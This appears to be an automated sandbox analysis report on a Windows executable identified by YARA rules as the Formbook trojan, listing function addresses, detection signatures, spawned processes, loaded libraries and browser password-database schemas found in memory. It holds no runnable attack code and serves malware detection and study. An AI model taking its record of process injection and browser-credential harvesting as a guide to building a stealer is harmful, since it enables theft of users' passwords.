Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014CB1B0	2_2_014CB1B0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C70C0	2_2_014C70C0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0156F0CC	2_2_0156F0CC
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157F0E0	2_2_0157F0E0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015770E9	2_2_015770E9
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014AD34C	2_2_014AD34C
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157132D	2_2_0157132D
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0150739A	2_2_0150739A
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014DB2C0	2_2_014DB2C0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015612ED	2_2_015612ED
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014DD2F0	2_2_014DD2F0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C52A0	2_2_014C52A0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01577571	2_2_01577571
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015895C3	2_2_015895C3
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0155D5B0	2_2_0155D5B0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014B1460	2_2_014B1460
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157F43F	2_2_0157F43F
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157F7B0	2_2_0157F7B0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01505630	2_2_01505630
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015716CC	2_2_015716CC
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C9950	2_2_014C9950
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014DB950	2_2_014DB950
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01555910	2_2_01555910
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0152D800	2_2_0152D800
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C38E0	2_2_014C38E0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157FB76	2_2_0157FB76
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01535BF0	2_2_01535BF0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014FDBF9	2_2_014FDBF9
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014DFB80	2_2_014DFB80
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01577A46	2_2_01577A46
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157FA49	2_2_0157FA49
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01533A6C	2_2_01533A6C
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0156DAC6	2_2_0156DAC6
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01505AA0	2_2_01505AA0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01561AA3	2_2_01561AA3
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0155DAAC	2_2_0155DAAC
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C3D40	2_2_014C3D40
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01571D5A	2_2_01571D5A
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01577D73	2_2_01577D73
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014DFDC0	2_2_014DFDC0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01539C32	2_2_01539C32
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157FCF2	2_2_0157FCF2
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157FF09	2_2_0157FF09
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C1F92	2_2_014C1F92
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157FFB1	2_2_0157FFB1
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C9EB0	2_2_014C9EB0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AB03E6	7_2_03AB03E6
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039FE3F0	7_2_039FE3F0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAA352	7_2_03AAA352
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A702C0	7_2_03A702C0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A90274	7_2_03A90274
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AB01AA	7_2_03AB01AA
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA41A2	7_2_03AA41A2
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA81CC	7_2_03AA81CC
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039E0100	7_2_039E0100
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A8A118	7_2_03A8A118
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A78158	7_2_03A78158
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A82000	7_2_03A82000
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039EC7C0	7_2_039EC7C0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F0770	7_2_039F0770
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A14750	7_2_03A14750
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A0C6E0	7_2_03A0C6E0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AB0591	7_2_03AB0591
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F0535	7_2_039F0535
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A9E4F6	7_2_03A9E4F6
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A94420	7_2_03A94420
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA2446	7_2_03AA2446
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA6BD7	7_2_03AA6BD7
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAAB40	7_2_03AAAB40
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039EEA80	7_2_039EEA80
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03ABA9A6	7_2_03ABA9A6
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F29A0	7_2_039F29A0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A06962	7_2_03A06962
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039D68B8	7_2_039D68B8
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A1E8F0	7_2_03A1E8F0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F2840	7_2_039F2840
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039FA840	7_2_039FA840
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A6EFA0	7_2_03A6EFA0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039E2FC8	7_2_039E2FC8
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A32F28	7_2_03A32F28
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A10F30	7_2_03A10F30
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A92F30	7_2_03A92F30
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A64F40	7_2_03A64F40
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A02E90	7_2_03A02E90
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AACE93	7_2_03AACE93
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAEEDB	7_2_03AAEEDB
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAEE26	7_2_03AAEE26
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F0E59	7_2_039F0E59
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A08DBF	7_2_03A08DBF
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039EADE0	7_2_039EADE0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039FAD00	7_2_039FAD00
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A8CD1F	7_2_03A8CD1F
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A90CB5	7_2_03A90CB5
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039E0CF2	7_2_039E0CF2
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F0C00	7_2_039F0C00
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A3739A	7_2_03A3739A
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA132D	7_2_03AA132D
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039DD34C	7_2_039DD34C
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F52A0	7_2_039F52A0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A912ED	7_2_03A912ED
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A0D2F0	7_2_03A0D2F0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A0B2C0	7_2_03A0B2C0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039FB1B0	7_2_039FB1B0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03ABB16B	7_2_03ABB16B
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A2516C	7_2_03A2516C
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039DF172	7_2_039DF172
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA70E9	7_2_03AA70E9
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAF0E0	7_2_03AAF0E0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F70C0	7_2_039F70C0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A9F0CC	7_2_03A9F0CC
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAF7B0	7_2_03AAF7B0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA16CC	7_2_03AA16CC
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A35630	7_2_03A35630
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A8D5B0	7_2_03A8D5B0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA7571	7_2_03AA7571
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAF43F	7_2_03AAF43F
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039E1460	7_2_039E1460
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A0FB80	7_2_03A0FB80
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A65BF0	7_2_03A65BF0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A2DBF9	7_2_03A2DBF9
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAFB76	7_2_03AAFB76
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A35AA0	7_2_03A35AA0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A8DAAC	7_2_03A8DAAC
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A91AA3	7_2_03A91AA3
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A9DAC6	7_2_03A9DAC6
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A63A6C	7_2_03A63A6C
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAFA49	7_2_03AAFA49
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA7A46	7_2_03AA7A46
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A85910	7_2_03A85910
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F9950	7_2_039F9950
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A0B950	7_2_03A0B950
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F38E0	7_2_039F38E0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A5D800	7_2_03A5D800
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F1F92	7_2_039F1F92
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAFFB1	7_2_03AAFFB1
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAFF09	7_2_03AAFF09
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F9EB0	7_2_039F9EB0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A0FDC0	7_2_03A0FDC0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA7D73	7_2_03AA7D73
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_039F3D40	7_2_039F3D40
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AA1D5A	7_2_03AA1D5A
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03AAFCF2	7_2_03AAFCF2
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A69C32	7_2_03A69C32
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_032219E0	7_2_032219E0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_0323A530	7_2_0323A530
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_0321CBA0	7_2_0321CBA0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_0321AE40	7_2_0321AE40
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_0321CDC0	7_2_0321CDC0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03223530	7_2_03223530
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_038CA36B	7_2_038CA36B
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_038CB098	7_2_038CB098
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_038CC02C	7_2_038CC02C
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_038CBB78	7_2_038CBB78
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_038CBC93	7_2_038CBC93

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: String function: 0153F290 appears 103 times
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: String function: 01507E54 appears 107 times
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: String function: 014AB970 appears 262 times
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: String function: 014F5130 appears 58 times
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: String function: 0152EA12 appears 86 times
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: String function: 03A6F290 appears 103 times
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: String function: 03A37E54 appears 107 times
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: String function: 039DB970 appears 262 times
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: String function: 03A25130 appears 58 times
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: String function: 03A5EA12 appears 86 times

PE / OLE file has an invalid certificate

Source: indent PWS-020199.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: indent PWS-020199.exe, 00000000.00000002.1684583267.000000000B670000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs indent PWS-020199.exe
Source: indent PWS-020199.exe, 00000000.00000000.1660465288.00000000010A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWsRG.exe( vs indent PWS-020199.exe
Source: indent PWS-020199.exe, 00000000.00000002.1680983268.00000000016BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs indent PWS-020199.exe
Source: indent PWS-020199.exe, 00000000.00000002.1684045855.0000000007A20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs indent PWS-020199.exe
Source: indent PWS-020199.exe, 00000000.00000002.1681604026.0000000003451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRT.dll. vs indent PWS-020199.exe
Source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenetiougc.exej% vs indent PWS-020199.exe
Source: indent PWS-020199.exe, 00000002.00000002.1974261923.00000000015AD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs indent PWS-020199.exe
Source: indent PWS-020199.exe	Binary or memory string: OriginalFilenameWsRG.exe( vs indent PWS-020199.exe

Uses 32bit PE files

Source: indent PWS-020199.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: indent PWS-020199.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, aNGB1Sr6aGUuEYu12d.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.indent PWS-020199.exe.7a20000.7.raw.unpack, xPD7bnX4M3GRwmAJ82.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@6/5

Source: C:\Users\user\Desktop\indent PWS-020199.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\indent PWS-020199.exe.log

Source: netiougc.exe, 00000007.00000003.2203860120.0000000003387000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2904358299.0000000003387000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: netiougc.exe, 00000007.00000002.2904358299.00000000033B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE field_info (form_signature INTEGER NOT NULL, field_signature INTEGER NOT NULL, field_type INTEGER NOT NULL, create_time INTEGER NOT NULL, UNIQUE (form_signature, field_signature))8D;

Source: unknown	Process created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Process created: C:\Windows\SysWOW64\netiougc.exe "C:\Windows\SysWOW64\netiougc.exe"
Source: C:\Windows\SysWOW64\netiougc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Process created: C:\Users\user\Desktop\indent PWS-020199.exe "C:\Users\user\Desktop\indent PWS-020199.exe"	Jump to behavior
Source: C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe	Process created: C:\Windows\SysWOW64\netiougc.exe "C:\Windows\SysWOW64\netiougc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: version.dll	Jump to behavior
